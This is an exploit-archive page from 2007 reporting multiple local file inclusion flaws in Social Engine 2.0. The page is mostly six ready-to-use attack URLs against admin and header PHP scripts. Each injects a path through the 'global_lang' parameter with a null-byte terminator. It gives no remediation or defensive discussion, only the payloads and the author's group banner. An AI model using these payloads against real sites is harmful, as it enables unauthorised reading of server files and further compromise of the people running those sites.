Social Engine 2.0 Multiple Local File Inclusion Vulnerabilities

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Social Engine 2.0 Multiple Local File Inclusion Vulnerabilities
# Published : 2007-12-21
# Author : MhZ91
# Previous Title : mBlog 1.2 (page) Remote File Disclosure Vulnerability
# Next Title : Shadowed Portal <= 5.7d3 Remote Command Execution Exploit

---------------------------------------------------------------
 ____            __________         __             ____  __  
/_   | ____     |_______    _____/  |_          /_   |/  |_
 |   |/        |  | _(__  <_/ ___   __  ______  |      __
 |   |   |     |  |/         ___|  |   /_____/  |   ||  | 
 |___|___|  /__|  /______  /___  >__|            |___||__| 
          /______|      /     /                          
---------------------------------------------------------------
Http://www.inj3ct-it.org     Staff[at]inj3ct-it[dot]org 
---------------------------------------------------------------
  Local File Inclusion
---------------------------------------------------------------
# Author: MhZ91
# Title: Social Engine v2.0 - Local File Inclusion
# Download: http://scriptmafia.org/2007/12/17/social_engine_v2.0.html
# Bug: Local File Inclusion
# Visit: http://www.inj3ct-it.org
---------------------------------------------------------------
Exploit: http://[site]/admin/admin_header_album.php?global_lang=[LFI]%00
Exploit: http://[site]/admin/admin_header_blog.php?global_lang=[LFI]%00
Exploit: http://[site]/admin/admin_header_group.php?global_lang=[LFI]%00
Exploit: http://[site]/header_album.php?global_lang=[LFI]%00
Exploit: http://[site]/header_blog.php?global_lang=[LFI]%00
Exploit: http://[site]/header_group.php?global_lang=[LFI]%00
---------------------------------------------------------------

# www.Syue.com [2007-12-21]